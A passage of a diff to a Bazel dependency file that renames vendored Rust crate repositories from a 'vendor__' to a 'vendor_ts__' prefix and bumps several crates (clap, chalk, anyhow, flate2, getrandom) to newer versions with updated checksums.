["https://static.crates.io/crates/android-tzdata/0.1.1/download"], 
@@ -685,7 +696,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__android_system_properties-0.1.5", + name = "vendor_ts__android_system_properties-0.1.5", sha256 = "819e7219dbd41043ac279b19830f2efc897156490d7fd6ea916720117ee66311", type = "tar.gz", urls = ["https://static.crates.io/crates/android_system_properties/0.1.5/download"], @@ -695,7 +706,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__anstream-0.6.18", + name = "vendor_ts__anstream-0.6.18", sha256 = "8acc5369981196006228e28809f761875c0327210a891e941f4c683b3a99529b", type = "tar.gz", urls = ["https://static.crates.io/crates/anstream/0.6.18/download"], @@ -705,7 +716,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__anstyle-1.0.10", + name = "vendor_ts__anstyle-1.0.10", sha256 = "55cc3b69f167a1ef2e161439aa98aed94e6028e5f9a59be9a6ffb47aef1651f9", type = "tar.gz", urls = ["https://static.crates.io/crates/anstyle/1.0.10/download"], @@ -715,7 +726,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__anstyle-parse-0.2.6", + name = "vendor_ts__anstyle-parse-0.2.6", sha256 = "3b2d16507662817a6a20a9ea92df6652ee4f94f914589377d69f3b21bc5798a9", type = "tar.gz", urls = ["https://static.crates.io/crates/anstyle-parse/0.2.6/download"], @@ -725,7 +736,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__anstyle-query-1.1.2", + name = "vendor_ts__anstyle-query-1.1.2", sha256 = "79947af37f4177cfead1110013d678905c37501914fba0efea834c3fe9a8d60c", type = "tar.gz", urls = ["https://static.crates.io/crates/anstyle-query/1.1.2/download"], 
@@ -735,27 +746,27 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__anstyle-wincon-3.0.6", - sha256 = "2109dbce0e72be3ec00bed26e6a7479ca384ad226efdd66db8fa2e3a38c83125", + name = "vendor_ts__anstyle-wincon-3.0.7", + sha256 = "ca3534e77181a9cc07539ad51f2141fe32f6c3ffd4df76db8ad92346b003ae4e", type = "tar.gz", - urls = ["https://static.crates.io/crates/anstyle-wincon/3.0.6/download"], - strip_prefix = "anstyle-wincon-3.0.6", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.anstyle-wincon-3.0.6.bazel"), + urls = ["https://static.crates.io/crates/anstyle-wincon/3.0.7/download"], + strip_prefix = "anstyle-wincon-3.0.7", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.anstyle-wincon-3.0.7.bazel"), ) maybe( http_archive, - name = "vendor__anyhow-1.0.95", - sha256 = "34ac096ce696dc2fcabef30516bb13c0a68a11d30131d3df6f04711467681b04", + name = "vendor_ts__anyhow-1.0.96", + sha256 = "6b964d184e89d9b6b67dd2715bc8e74cf3107fb2b529990c90cf517326150bf4", type = "tar.gz", - urls = ["https://static.crates.io/crates/anyhow/1.0.95/download"], - strip_prefix = "anyhow-1.0.95", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.anyhow-1.0.95.bazel"), + urls = ["https://static.crates.io/crates/anyhow/1.0.96/download"], + strip_prefix = "anyhow-1.0.96", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.anyhow-1.0.96.bazel"), ) maybe( http_archive, - name = "vendor__argfile-0.2.1", + name = "vendor_ts__argfile-0.2.1", sha256 = "0a1cc0ba69de57db40674c66f7cf2caee3981ddef084388482c95c0e2133e5e8", type = "tar.gz", urls = ["https://static.crates.io/crates/argfile/0.2.1/download"], 
@@ -765,7 +776,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__arrayvec-0.7.6", + name = "vendor_ts__arrayvec-0.7.6", sha256 = "7c02d123df017efcdfbd739ef81735b36c5ba83ec3c59c80a9d7ecc718f92e50", type = "tar.gz", urls = ["https://static.crates.io/crates/arrayvec/0.7.6/download"], @@ -775,7 +786,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__atomic-0.6.0", + name = "vendor_ts__atomic-0.6.0", sha256 = "8d818003e740b63afc82337e3160717f4f63078720a810b7b903e70a5d1d2994", type = "tar.gz", urls = ["https://static.crates.io/crates/atomic/0.6.0/download"], @@ -785,7 +796,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__autocfg-1.4.0", + name = "vendor_ts__autocfg-1.4.0", sha256 = "ace50bade8e6234aa140d9a2f552bbee1db4d353f69b8217bc503490fc1a9f26", type = "tar.gz", urls = ["https://static.crates.io/crates/autocfg/1.4.0/download"], @@ -795,7 +806,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__base64-0.22.1", + name = "vendor_ts__base64-0.22.1", sha256 = "72b3254f16251a8381aa12e40e3c4d2f0199f8c6508fbecb9d91f575e0fbb8c6", type = "tar.gz", urls = ["https://static.crates.io/crates/base64/0.22.1/download"], @@ -805,7 +816,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__bitflags-1.3.2", + name = "vendor_ts__bitflags-1.3.2", sha256 = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a", type = "tar.gz", urls = ["https://static.crates.io/crates/bitflags/1.3.2/download"], 
@@ -815,17 +826,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__bitflags-2.7.0", - sha256 = "1be3f42a67d6d345ecd59f675f3f012d6974981560836e938c22b424b85ce1be", + name = "vendor_ts__bitflags-2.8.0", + sha256 = "8f68f53c83ab957f72c32642f3868eec03eb974d1fb82e453128456482613d36", type = "tar.gz", - urls = ["https://static.crates.io/crates/bitflags/2.7.0/download"], - strip_prefix = "bitflags-2.7.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.bitflags-2.7.0.bazel"), + urls = ["https://static.crates.io/crates/bitflags/2.8.0/download"], + strip_prefix = "bitflags-2.8.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.bitflags-2.8.0.bazel"), ) maybe( http_archive, - name = "vendor__borsh-1.5.3", + name = "vendor_ts__borsh-1.5.3", sha256 = "2506947f73ad44e344215ccd6403ac2ae18cd8e046e581a441bf8d199f257f03", type = "tar.gz", urls = ["https://static.crates.io/crates/borsh/1.5.3/download"], @@ -835,7 +846,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__bstr-1.11.3", + name = "vendor_ts__bstr-1.11.3", sha256 = "531a9155a481e2ee699d4f98f43c0ca4ff8ee1bfd55c31e9e98fb29d2b176fe0", type = "tar.gz", urls = ["https://static.crates.io/crates/bstr/1.11.3/download"], @@ -845,7 +856,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__bumpalo-3.16.0", + name = "vendor_ts__bumpalo-3.16.0", sha256 = "79296716171880943b8470b5f8d03aa55eb2e645a4874bdbb28adb49162e012c", type = "tar.gz", urls = ["https://static.crates.io/crates/bumpalo/3.16.0/download"], @@ -855,7 +866,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__bytemuck-1.21.0", + name = "vendor_ts__bytemuck-1.21.0", sha256 = "ef657dfab802224e671f5818e9a4935f9b1957ed18e58292690cc39e7a4092a3", type = "tar.gz", urls = ["https://static.crates.io/crates/bytemuck/1.21.0/download"], 
@@ -865,7 +876,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__byteorder-1.5.0", + name = "vendor_ts__byteorder-1.5.0", sha256 = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b", type = "tar.gz", urls = ["https://static.crates.io/crates/byteorder/1.5.0/download"], @@ -875,7 +886,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__camino-1.1.9", + name = "vendor_ts__camino-1.1.9", sha256 = "8b96ec4966b5813e2c0507c1f86115c8c5abaadc3980879c3424042a02fd1ad3", type = "tar.gz", urls = ["https://static.crates.io/crates/camino/1.1.9/download"], @@ -885,7 +896,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cargo-platform-0.1.9", + name = "vendor_ts__cargo-platform-0.1.9", sha256 = "e35af189006b9c0f00a064685c727031e3ed2d8020f7ba284d78cc2671bd36ea", type = "tar.gz", urls = ["https://static.crates.io/crates/cargo-platform/0.1.9/download"], @@ -895,7 +906,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cargo_metadata-0.18.1", + name = "vendor_ts__cargo_metadata-0.18.1", sha256 = "2d886547e41f740c616ae73108f6eb70afe6d940c7bc697cb30f13daec073037", type = "tar.gz", urls = ["https://static.crates.io/crates/cargo_metadata/0.18.1/download"], @@ -905,7 +916,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cc-1.2.7", + name = "vendor_ts__cc-1.2.7", sha256 = "a012a0df96dd6d06ba9a1b29d6402d1a5d77c6befd2566afdc26e10603dc93d7", type = "tar.gz", urls = ["https://static.crates.io/crates/cc/1.2.7/download"], @@ -915,7 +926,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cfg-if-1.0.0", + name = "vendor_ts__cfg-if-1.0.0", sha256 = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd", type = "tar.gz", urls = ["https://static.crates.io/crates/cfg-if/1.0.0/download"], 
@@ -925,7 +936,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cfg_aliases-0.2.1", + name = "vendor_ts__cfg_aliases-0.2.1", sha256 = "613afe47fcd5fac7ccf1db93babcb082c5994d996f20b8b159f2ad1658eb5724", type = "tar.gz", urls = ["https://static.crates.io/crates/cfg_aliases/0.2.1/download"], 
@@ -935,47 +946,47 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__chalk-derive-0.98.0", - sha256 = "9426c8fd0fe61c3da880b801d3b510524df17843a8f9ec1f5b9cec24fb7412df", + name = "vendor_ts__chalk-derive-0.99.0", + sha256 = "572583d9b97f9d277e5c7607f8239a30e2e04d3ed3b47c87d1cb2152ae724073", type = "tar.gz", - urls = ["https://static.crates.io/crates/chalk-derive/0.98.0/download"], - strip_prefix = "chalk-derive-0.98.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-derive-0.98.0.bazel"), + urls = ["https://static.crates.io/crates/chalk-derive/0.99.0/download"], + strip_prefix = "chalk-derive-0.99.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-derive-0.99.0.bazel"), ) maybe( http_archive, - name = "vendor__chalk-ir-0.98.0", - sha256 = "d5f2eb1cd6054da221bd1ac0197fb2fe5e2caf3dcb93619398fc1433f8f09093", + name = "vendor_ts__chalk-ir-0.99.0", + sha256 = "e60e0ef9c81dce1336a9ed3c76f08775f5b623151d96d85ba45f7b10de76d1c7", type = "tar.gz", - urls = ["https://static.crates.io/crates/chalk-ir/0.98.0/download"], - strip_prefix = "chalk-ir-0.98.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-ir-0.98.0.bazel"), + urls = ["https://static.crates.io/crates/chalk-ir/0.99.0/download"], + strip_prefix = "chalk-ir-0.99.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-ir-0.99.0.bazel"), ) maybe( http_archive, - name = "vendor__chalk-recursive-0.98.0", - sha256 = "129dc03458f71cfb9c3cd621c9c68166a94e87b85b16ccd29af015d7ff9a1c61", + name = "vendor_ts__chalk-recursive-0.99.0", + sha256 = "5a06350d614e22b03a69b8105e3541614450a7ea48bc58ecc6c6bd92731a3995", type = "tar.gz", - urls = ["https://static.crates.io/crates/chalk-recursive/0.98.0/download"], - strip_prefix = "chalk-recursive-0.98.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-recursive-0.98.0.bazel"), + urls = 
["https://static.crates.io/crates/chalk-recursive/0.99.0/download"], + strip_prefix = "chalk-recursive-0.99.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-recursive-0.99.0.bazel"), ) maybe( http_archive, - name = "vendor__chalk-solve-0.98.0", - sha256 = "d7e8a8c1e928f98cdf227b868416ef21dcd8cc3c61b347576d783713444d41c8", + name = "vendor_ts__chalk-solve-0.99.0", + sha256 = "0e428761e9b55bee516bfe2457caed8b6d1b86353f92ae825bbe438a36ce91e8", type = "tar.gz", - urls = ["https://static.crates.io/crates/chalk-solve/0.98.0/download"], - strip_prefix = "chalk-solve-0.98.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-solve-0.98.0.bazel"), + urls = ["https://static.crates.io/crates/chalk-solve/0.99.0/download"], + strip_prefix = "chalk-solve-0.99.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-solve-0.99.0.bazel"), ) maybe( http_archive, - name = "vendor__chrono-0.4.39", + name = "vendor_ts__chrono-0.4.39", sha256 = "7e36cc9d416881d2e24f9a963be5fb1cd90966419ac844274161d10488b3e825", type = "tar.gz", urls = ["https://static.crates.io/crates/chrono/0.4.39/download"], 
@@ -985,37 +996,37 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__clap-4.5.26", - sha256 = "a8eb5e908ef3a6efbe1ed62520fb7287959888c88485abe072543190ecc66783", + name = "vendor_ts__clap-4.5.31", + sha256 = "027bb0d98429ae334a8698531da7077bdf906419543a35a55c2cb1b66437d767", type = "tar.gz", - urls = ["https://static.crates.io/crates/clap/4.5.26/download"], - strip_prefix = "clap-4.5.26", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap-4.5.26.bazel"), + urls = ["https://static.crates.io/crates/clap/4.5.31/download"], + strip_prefix = "clap-4.5.31", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap-4.5.31.bazel"), ) maybe( http_archive, - name = "vendor__clap_builder-4.5.26", - sha256 = "96b01801b5fc6a0a232407abc821660c9c6d25a1cafc0d4f85f29fb8d9afc121", + name = "vendor_ts__clap_builder-4.5.31", + sha256 = "5589e0cba072e0f3d23791efac0fd8627b49c829c196a492e88168e6a669d863", type = "tar.gz", - urls = ["https://static.crates.io/crates/clap_builder/4.5.26/download"], - strip_prefix = "clap_builder-4.5.26", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap_builder-4.5.26.bazel"), + urls = ["https://static.crates.io/crates/clap_builder/4.5.31/download"], + strip_prefix = "clap_builder-4.5.31", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap_builder-4.5.31.bazel"), ) maybe( http_archive, - name = "vendor__clap_derive-4.5.24", - sha256 = "54b755194d6389280185988721fffba69495eed5ee9feeee9a599b53db80318c", + name = "vendor_ts__clap_derive-4.5.28", + sha256 = "bf4ced95c6f4a675af3da73304b9ac4ed991640c36374e4b46795c49e17cf1ed", type = "tar.gz", - urls = ["https://static.crates.io/crates/clap_derive/4.5.24/download"], - strip_prefix = "clap_derive-4.5.24", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap_derive-4.5.24.bazel"), + urls = 
["https://static.crates.io/crates/clap_derive/4.5.28/download"], + strip_prefix = "clap_derive-4.5.28", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap_derive-4.5.28.bazel"), ) maybe( http_archive, - name = "vendor__clap_lex-0.7.4", + name = "vendor_ts__clap_lex-0.7.4", sha256 = "f46ad14479a25103f283c0f10005961cf086d8dc42205bb44c46ac563475dca6", type = "tar.gz", urls = ["https://static.crates.io/crates/clap_lex/0.7.4/download"], @@ -1025,7 +1036,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__colorchoice-1.0.3", + name = "vendor_ts__colorchoice-1.0.3", sha256 = "5b63caa9aa9397e2d9480a9b13673856c78d8ac123288526c37d7839f2a86990", type = "tar.gz", urls = ["https://static.crates.io/crates/colorchoice/1.0.3/download"], @@ -1035,7 +1046,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__core-foundation-sys-0.8.7", + name = "vendor_ts__core-foundation-sys-0.8.7", sha256 = "773648b94d0e5d620f64f280777445740e61fe701025087ec8b57f45c791888b", type = "tar.gz", urls = ["https://static.crates.io/crates/core-foundation-sys/0.8.7/download"], @@ -1045,7 +1056,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__countme-3.0.1", + name = "vendor_ts__countme-3.0.1", sha256 = "7704b5fdd17b18ae31c4c1da5a2e0305a2bf17b5249300a9ee9ed7b72114c636", type = "tar.gz", urls = ["https://static.crates.io/crates/countme/3.0.1/download"], @@ -1055,7 +1066,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cov-mark-2.0.0", + name = "vendor_ts__cov-mark-2.0.0", sha256 = "0570650661aa447e7335f1d5e4f499d8e58796e617bedc9267d971e51c8b49d4", type = "tar.gz", urls = ["https://static.crates.io/crates/cov-mark/2.0.0/download"], 
@@ -1065,7 +1076,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__crc32fast-1.4.2", + name = "vendor_ts__crc32fast-1.4.2", sha256 = "a97769d94ddab943e4510d138150169a2758b5ef3eb191a9ee688de3e23ef7b3", type = "tar.gz", urls = ["https://static.crates.io/crates/crc32fast/1.4.2/download"], @@ -1075,7 +1086,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__crossbeam-channel-0.5.14", + name = "vendor_ts__crossbeam-channel-0.5.14", sha256 = "06ba6d68e24814cb8de6bb986db8222d3a027d15872cabc0d18817bc3c0e4471", type = "tar.gz", urls = ["https://static.crates.io/crates/crossbeam-channel/0.5.14/download"], @@ -1085,7 +1096,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__crossbeam-deque-0.8.6", + name = "vendor_ts__crossbeam-deque-0.8.6", sha256 = "9dd111b7b7f7d55b72c0a6ae361660ee5853c9af73f70c3c2ef6858b950e2e51", type = "tar.gz", urls = ["https://static.crates.io/crates/crossbeam-deque/0.8.6/download"], @@ -1095,7 +1106,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__crossbeam-epoch-0.9.18", + name = "vendor_ts__crossbeam-epoch-0.9.18", sha256 = "5b82ac4a3c2ca9c3460964f020e1402edd5753411d7737aa39c3714ad1b5420e", type = "tar.gz", urls = ["https://static.crates.io/crates/crossbeam-epoch/0.9.18/download"], @@ -1105,7 +1116,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__crossbeam-utils-0.8.21", + name = "vendor_ts__crossbeam-utils-0.8.21", sha256 = "d0a5c400df2834b80a4c3327b3aad3a4c4cd4de0629063962b03235697506a28", type = "tar.gz", urls = ["https://static.crates.io/crates/crossbeam-utils/0.8.21/download"], @@ -1115,7 +1126,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__darling-0.20.10", + name = "vendor_ts__darling-0.20.10", sha256 = "6f63b86c8a8826a49b8c21f08a2d07338eec8d900540f8630dc76284be802989", type = "tar.gz", urls = ["https://static.crates.io/crates/darling/0.20.10/download"], 
@@ -1125,7 +1136,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__darling_core-0.20.10", + name = "vendor_ts__darling_core-0.20.10", sha256 = "95133861a8032aaea082871032f5815eb9e98cef03fa916ab4500513994df9e5", type = "tar.gz", urls = ["https://static.crates.io/crates/darling_core/0.20.10/download"], @@ -1135,7 +1146,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__darling_macro-0.20.10", + name = "vendor_ts__darling_macro-0.20.10", sha256 = "d336a2a514f6ccccaa3e09b02d41d35330c07ddf03a62165fcec10bb561c7806", type = "tar.gz", urls = ["https://static.crates.io/crates/darling_macro/0.20.10/download"], @@ -1145,7 +1156,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__dashmap-5.5.3", + name = "vendor_ts__dashmap-5.5.3", sha256 = "978747c1d849a7d2ee5e8adc0159961c48fb7e5db2f06af6723b80123bb53856", type = "tar.gz", urls = ["https://static.crates.io/crates/dashmap/5.5.3/download"], @@ -1155,7 +1166,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__deranged-0.3.11", + name = "vendor_ts__deranged-0.3.11", sha256 = "b42b6fa04a440b495c8b04d0e71b707c585f83cb9cb28cf8cd0d976c315e31b4", type = "tar.gz", urls = ["https://static.crates.io/crates/deranged/0.3.11/download"], @@ -1165,7 +1176,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__drop_bomb-0.1.5", + name = "vendor_ts__drop_bomb-0.1.5", sha256 = "9bda8e21c04aca2ae33ffc2fd8c23134f3cac46db123ba97bd9d3f3b8a4a85e1", type = "tar.gz", urls = ["https://static.crates.io/crates/drop_bomb/0.1.5/download"], @@ -1175,7 +1186,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__dunce-1.0.5", + name = "vendor_ts__dunce-1.0.5", sha256 = "92773504d58c093f6de2459af4af33faa518c13451eb8f2b5698ed3d36e7c813", type = "tar.gz", urls = ["https://static.crates.io/crates/dunce/1.0.5/download"], 
@@ -1185,17 +1196,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__either-1.13.0", - sha256 = "60b1af1c220855b6ceac025d3f6ecdd2b7c4894bfe9cd9bda4fbb4bc7c0d4cf0", + name = "vendor_ts__either-1.14.0", + sha256 = "b7914353092ddf589ad78f25c5c1c21b7f80b0ff8621e7c814c3485b5306da9d", type = "tar.gz", - urls = ["https://static.crates.io/crates/either/1.13.0/download"], - strip_prefix = "either-1.13.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.either-1.13.0.bazel"), + urls = ["https://static.crates.io/crates/either/1.14.0/download"], + strip_prefix = "either-1.14.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.either-1.14.0.bazel"), ) maybe( http_archive, - name = "vendor__ena-0.14.3", + name = "vendor_ts__ena-0.14.3", sha256 = "3d248bdd43ce613d87415282f69b9bb99d947d290b10962dd6c56233312c2ad5", type = "tar.gz", urls = ["https://static.crates.io/crates/ena/0.14.3/download"], @@ -1205,7 +1216,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-0.2.33", + name = "vendor_ts__encoding-0.2.33", sha256 = "6b0d943856b990d12d3b55b359144ff341533e516d94098b1d3fc1ac666d36ec", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding/0.2.33/download"], @@ -1215,7 +1226,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-index-japanese-1.20141219.5", + name = "vendor_ts__encoding-index-japanese-1.20141219.5", sha256 = "04e8b2ff42e9a05335dbf8b5c6f7567e5591d0d916ccef4e0b1710d32a0d0c91", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding-index-japanese/1.20141219.5/download"], 
@@ -1225,7 +1236,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-index-korean-1.20141219.5", + name = "vendor_ts__encoding-index-korean-1.20141219.5", sha256 = "4dc33fb8e6bcba213fe2f14275f0963fd16f0a02c878e3095ecfdf5bee529d81", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding-index-korean/1.20141219.5/download"], @@ -1235,7 +1246,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-index-simpchinese-1.20141219.5", + name = "vendor_ts__encoding-index-simpchinese-1.20141219.5", sha256 = "d87a7194909b9118fc707194baa434a4e3b0fb6a5a757c73c3adb07aa25031f7", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding-index-simpchinese/1.20141219.5/download"], @@ -1245,7 +1256,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-index-singlebyte-1.20141219.5", + name = "vendor_ts__encoding-index-singlebyte-1.20141219.5", sha256 = "3351d5acffb224af9ca265f435b859c7c01537c0849754d3db3fdf2bfe2ae84a", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding-index-singlebyte/1.20141219.5/download"], @@ -1255,7 +1266,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding-index-tradchinese-1.20141219.5", + name = "vendor_ts__encoding-index-tradchinese-1.20141219.5", sha256 = "fd0e20d5688ce3cab59eb3ef3a2083a5c77bf496cb798dc6fcdb75f323890c18", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding-index-tradchinese/1.20141219.5/download"], @@ -1265,7 +1276,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__encoding_index_tests-0.1.4", + name = "vendor_ts__encoding_index_tests-0.1.4", sha256 = "a246d82be1c9d791c5dfde9a2bd045fc3cbba3fa2b11ad558f27d01712f00569", type = "tar.gz", urls = ["https://static.crates.io/crates/encoding_index_tests/0.1.4/download"], 
@@ -1275,7 +1286,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__equivalent-1.0.1", + name = "vendor_ts__equivalent-1.0.1", sha256 = "5443807d6dff69373d433ab9ef5378ad8df50ca6298caf15de6e52e24aaf54d5", type = "tar.gz", urls = ["https://static.crates.io/crates/equivalent/1.0.1/download"], @@ -1285,7 +1296,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__figment-0.10.19", + name = "vendor_ts__figment-0.10.19", sha256 = "8cb01cd46b0cf372153850f4c6c272d9cbea2da513e07538405148f95bd789f3", type = "tar.gz", urls = ["https://static.crates.io/crates/figment/0.10.19/download"], @@ -1295,7 +1306,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__filetime-0.2.25", + name = "vendor_ts__filetime-0.2.25", sha256 = "35c0522e981e68cbfa8c3f978441a5f34b30b96e146b33cd3359176b50fe8586", type = "tar.gz", urls = ["https://static.crates.io/crates/filetime/0.2.25/download"], @@ -1305,7 +1316,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__fixedbitset-0.4.2", + name = "vendor_ts__fixedbitset-0.4.2", sha256 = "0ce7134b9999ecaf8bcd65542e436736ef32ddca1b3e06094cb6ec5755203b80", type = "tar.gz", urls = ["https://static.crates.io/crates/fixedbitset/0.4.2/download"], 
@@ -1315,17 +1326,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__flate2-1.0.35", - sha256 = "c936bfdafb507ebbf50b8074c54fa31c5be9a1e7e5f467dd659697041407d07c", + name = "vendor_ts__flate2-1.1.0", + sha256 = "11faaf5a5236997af9848be0bef4db95824b1d534ebc64d0f0c6cf3e67bd38dc", type = "tar.gz", - urls = ["https://static.crates.io/crates/flate2/1.0.35/download"], - strip_prefix = "flate2-1.0.35", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.flate2-1.0.35.bazel"), + urls = ["https://static.crates.io/crates/flate2/1.1.0/download"], + strip_prefix = "flate2-1.1.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.flate2-1.1.0.bazel"), ) maybe( http_archive, - name = "vendor__fnv-1.0.7", + name = "vendor_ts__fnv-1.0.7", sha256 = "3f9eec918d3f24069decb9af1554cad7c880e2da24a9afd88aca000531ab82c1", type = "tar.gz", urls = ["https://static.crates.io/crates/fnv/1.0.7/download"], @@ -1335,7 +1346,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__fs-err-2.11.0", + name = "vendor_ts__fs-err-2.11.0", sha256 = "88a41f105fe1d5b6b34b2055e3dc59bb79b46b48b2040b9e6c7b4b5de097aa41", type = "tar.gz", urls = ["https://static.crates.io/crates/fs-err/2.11.0/download"], @@ -1345,7 +1356,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__fsevent-sys-4.1.0", + name = "vendor_ts__fsevent-sys-4.1.0", sha256 = "76ee7a02da4d231650c7cea31349b889be2f45ddb3ef3032d2ec8185f6313fd2", type = "tar.gz", urls = ["https://static.crates.io/crates/fsevent-sys/4.1.0/download"], @@ -1355,7 +1366,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__fst-0.4.7", + name = "vendor_ts__fst-0.4.7", sha256 = "7ab85b9b05e3978cc9a9cf8fea7f01b494e1a09ed3037e16ba39edc7a29eb61a", type = "tar.gz", urls = ["https://static.crates.io/crates/fst/0.4.7/download"], 
@@ -1365,17 +1376,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__getrandom-0.2.15", - sha256 = "c4567c8db10ae91089c99af84c68c38da3ec2f087c3f82960bcdbf3656b6f4d7", + name = "vendor_ts__getrandom-0.3.1", + sha256 = "43a49c392881ce6d5c3b8cb70f98717b7c07aabbdff06687b9030dbfbe2725f8", type = "tar.gz", - urls = ["https://static.crates.io/crates/getrandom/0.2.15/download"], - strip_prefix = "getrandom-0.2.15", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.getrandom-0.2.15.bazel"), + urls = ["https://static.crates.io/crates/getrandom/0.3.1/download"], + strip_prefix = "getrandom-0.3.1", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.getrandom-0.3.1.bazel"), ) maybe( http_archive, - name = "vendor__glob-0.3.2", + name = "vendor_ts__glob-0.3.2", sha256 = "a8d1add55171497b4705a648c6b583acafb01d58050a51727785f0b2c8e0a2b2", type = "tar.gz", urls = ["https://static.crates.io/crates/glob/0.3.2/download"], @@ -1385,7 +1396,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__globset-0.4.15", + name = "vendor_ts__globset-0.4.15", sha256 = "15f1ce686646e7f1e19bf7d5533fe443a45dbfb990e00629110797578b42fb19", type = "tar.gz", urls = ["https://static.crates.io/crates/globset/0.4.15/download"], @@ -1395,7 +1406,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__hashbrown-0.12.3", + name = "vendor_ts__hashbrown-0.12.3", sha256 = "8a9ee70c43aaf417c914396645a0fa852624801b24ebb7ae78fe8272889ac888", type = "tar.gz", urls = ["https://static.crates.io/crates/hashbrown/0.12.3/download"], @@ -1405,7 +1416,7 